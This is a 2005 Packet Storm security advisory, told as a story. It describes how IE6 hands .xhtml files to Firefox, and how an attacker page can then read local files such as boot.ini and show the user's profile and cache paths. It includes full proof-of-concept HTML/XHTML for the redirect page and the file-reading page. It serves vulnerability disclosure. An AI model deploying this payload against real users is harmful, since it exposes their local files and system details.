ie6fire.txt

2005-06-01T00:00:00
ID PACKETSTORM:37797
Type packetstorm
Reporter bitlance winter
Modified 2005-06-01T00:00:00

Description

                                        
                                            `Hello , all.  
  
IE6 kicks Firefox's BUG : Local Information Disclosure.  
  
MIME types (commonly used on the web) determine what kind of content  
is being sent down and give the browser an idea of how to parse,render  
or otherwise deal with the content.  
"application/zip", for example, is what's sent by the web server when  
your browser accesses a ZIP file.  
Directory-specific directive files such as .htaccess (as used by Apache,  
for example) can be used to associate a particular MIME type with a given  
file extension.For example, AddType application/xhtml+xml .xhtml will  
configure Apache to send .xhtml files with application/xhtml+xml.  
  
Internet Explorer's support of XHTML is incomplete.IE does not recognize  
the xhtml MIME type - "application/xhtml+xml" which is required for true  
XHTML compliance. So instead of rendering the page, a file download prompt  
is presented to the user.  
  
See also.  
http://www.w3.org/TR/xhtml-media-types/  
http://www.rfc-editor.org/rfc/rfc3236.txt  
http://www.w3.org/People/mimasa/test/xhtml/media-types/  
http://www.w3.org/People/mimasa/test/xhtml/media-types/results  
  
Many people who wants to read XHTML files, install Firefox that supports  
XHTML files with MIME type - "application/xhtml+xml" .  
  
=========  
STORY  
=========  
A man gets a new PC. OS is Windows XP SP2. Of course, he does not forget  
WindowsUpdate. Now his machine is full-pached.  
He installs Firefox, and sets that Firefox is as his default browser.  
He wants to read XHTML files with "Content-Type: application/xhtml+xml".  
Next day,he opens his Firefox Options General , clears "Firefox should  
check to see if it is the default browser when starting" check box. And  
he runs InternetExplorer, he sets IE as his default browser again.  
  
Now he opens "My documents folder" window, choosing 'tools',then 'folder  
options', 'filetypes' tab. He selects the filetype ".xhtml" and check  
out it. He find that Firefox is still associated with the file type.  
Yes. InternetExplorer can not open XHTML files, he thinks. O.K. when  
he wants to read HTML files, IE opens the pages, and when he wants to  
read XHTML files, Firefox opens the resources, COOL TIPS! he thinks.  
  
=========  
NOTE  
=========  
=== He is wrong. That is not COOL. ===  
  
=========  
STORY  
=========  
An attacker makes "bar.xhtml" (application/xhtml+xml) and "foo.html"  
(text/html). Below are samples.  
  
=== http://[malicious-site]/foo.html ===  
The server gives Content-Type: text/html  
========================================  
<html>  
<head>  
<title>link to bar.xhtml</title>  
<meta http-equiv="Refresh" content="1; URL=./bar.xhtml">  
</head>  
<body><a href="./bar.xhtml">Click Me.</a>  
</body>  
</html>  
========================================  
  
=== http://[malicious-site]/bar.xhtml ===  
The server gives Content-Type: application/xhtml+xml  
=========================================  
<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"  
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">  
<head>  
<title>IE - Firefox : Local Information Disclosure  
</title>  
<link rev="MADE" href="mailto:foo@example.com" />  
<link rel="CONTENTS" href="./" />  
<script type="text/javascript">  
<![CDATA[  
function Test(){  
alert(local_file.document.firstChild.innerHTML);  
}  
window.onload=Test;  
]]>  
</script>  
</head>  
<body>  
<h1>IE - Firefox : Local Information Disclosure</h1>  
<h2>  
boot.ini (Windows XP with Service Pack 2)  
</h2>  
<div>  
<object data="file:///c:/boot.ini" type="text/plain" width="780"  
height="130" name="local_file">  
<p>display local_file</p>  
</object>  
</div>  
<h2>  
%USERPROFILE% Folder , Internet Cache Folder Random PATH for IE  
</h2>  
<div>  
<script type="text/javascript">  
<![CDATA[  
var displocation=location.href;  
var divElement=document.createElement('DIV');  
divElement.setAttribute('style',  
'color:black; background-color:BlanchedAlmond;');  
document.body.appendChild(divElement);  
var text=document.createTextNode(displocation);  
divElement.appendChild(text);  
]]>  
</script>  
</div>  
</body>  
</html>  
=========================================  
  
=========  
NOTE  
=========  
  
See also.  
  
[Bugzilla]  
https://bugzilla.mozilla.org/show_bug.cgi?id=273419  
https://bugzilla.mozilla.org/show_bug.cgi?id=230606  
  
[Full-Disclosure ML]  
Disclosure of local file content in Mozilla Firefox and Opera  
http://lists.grok.org.uk/pipermail/full-disclosure/2004-December/  
029833.html --- Giovanni Delvecchio  
029846.html --- Juergen Schmidt  
029856.html --- Thor Larholm  
(Thanks a lot.)  
  
=========  
STORY  
=========  
One day, he uses IE, and visits the attacker's site.  
As soon as he accesses the URL , http://[malicious-site]/foo.html ,  
he sees the "File Download" dialog box pop up.  
  
===============================================  
File Download - Security Warning  
  
Do you want to run or save this file?  
  
Name: bar.xhtml  
Type: Unknown (file type), 1.23 KB  
From: [malicious-site]  
  
button: [Run] [Save] [Cancel]  
  
check box: Always ask before opening this type of file  
  
Blue Shield Icon :  
While files from the Internet can be useful,this file type can  
potencially harm your computer. If you do not trust the source, do not  
run or save this software. What's the risk?  
  
================================================  
  
=========  
NOTE  
=========  
Be careful to Checkbox, And Blue Shield Icon. Not yellow Icon !!  
  
=========  
STORY  
=========  
He read this Dialog and think that ,,,,,,.  
- O.K. It is NOT yellow Icon. if the file is bad one, Icon is yellow  
- or red. Why blue Icon ? Because "bar.xhtml" is a XHTML file and  
- it is safe. Type is unknown? Because IE does not recognize  
- the xhtml MIME type. Good.  
- Hmmmmm. "Always ask before opening this type of file" ?  
- XHTML file is safe when Firefox opens it. I will clear the check  
- box. That is all. O.K. Now I will click the "Run" button.  
  
=========  
NOTE  
=========  
When you first choose to download a file in Internet Explorer, you  
receive a Confirm File Open dialog box."The Always ask before opening  
this type of file" check box in this dialog box is selected.  
If you clear the "Always ask before opening this type of file" check  
box, the registry entry for this setting is changed and you do not see  
the Confirm File Open dialog box in subsequent download sessions.  
Instead, Internet Explorer automatically opens files instead of  
downloading them.  
  
By the way, see also.  
http://www.microsoft.com/technet/security/smallbusiness/prodtech/  
windowsxp/iesecxp.mspx  
[quoted]  
Heed any warnings. When a Web site attempts to download a file to your  
computer, Internet Explorer displays a message about saving, running,  
or installing the file. If the message contains a yellow caution icon,  
then the file has been identified as one that could pose a risk.  
[/quoted]  
Where is about blue Icon? Is it safe? ;-)  
In this story, 'HE' knows that yellow or red is dangerous icon.  
At last he clicks 'Run' button.  
  
=========  
STORY  
=========  
Firefox runs and display http://[malicious-site]/bar.xhtml  
Files of this XHTML type are automatically placed  
=== in the Temporary Internet Files folder ====  
and opened by the program that is associated with the file type.  
  
Then his local machine information is disclosed via javascript.  
boot.ini  
%USERPROFILE%  
Internet Cache Folder Random PATH for IE  
and so on E.T.C.  
  
He is very surprised.  
His name is bitlance winter.... ;-<  
  
=========  
NOTE  
=========  
This is a bad behavior of InternetExplorer.  
"Files of the type are automatically placed  
=== in the Temporary Internet Files folder ====  
and opened by the program that is associated with the file type."  
  
This is a bad behavior of InternetExplorer ,too.  
If he does not clear the checkbox "Allways..." when he clicks  
"Run" button, files of the type are placed  
=== in the Temporary Internet Files folder ====  
and opened by the program that is associated with the file type.  
  
Firefox ? uhhhmmmmmm .  
Opera is FIXED, perhaps.  
  
Tested on  
WindowsXP SP2  
  
InternetExlorer6 SP2 full-patched (Japanese version)  
- Version 6.0.2900.2180.xpsp_sp2_gdr.050301-1519  
  
Filrefox 1.0.3 (en-US)  
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7)  
- Gecko/20050414 Firefox/1.0.3  
  
Sorry too bad English.  
Thank you for your reading this true story.  
Best Regards.  
  
--  
bitlance winter  
  
_________________________________________________________________  
Don’t just search. Find. Check out the new MSN Search!   
http://search.msn.click-url.com/go/onm00200636ave/direct/01/  
  
`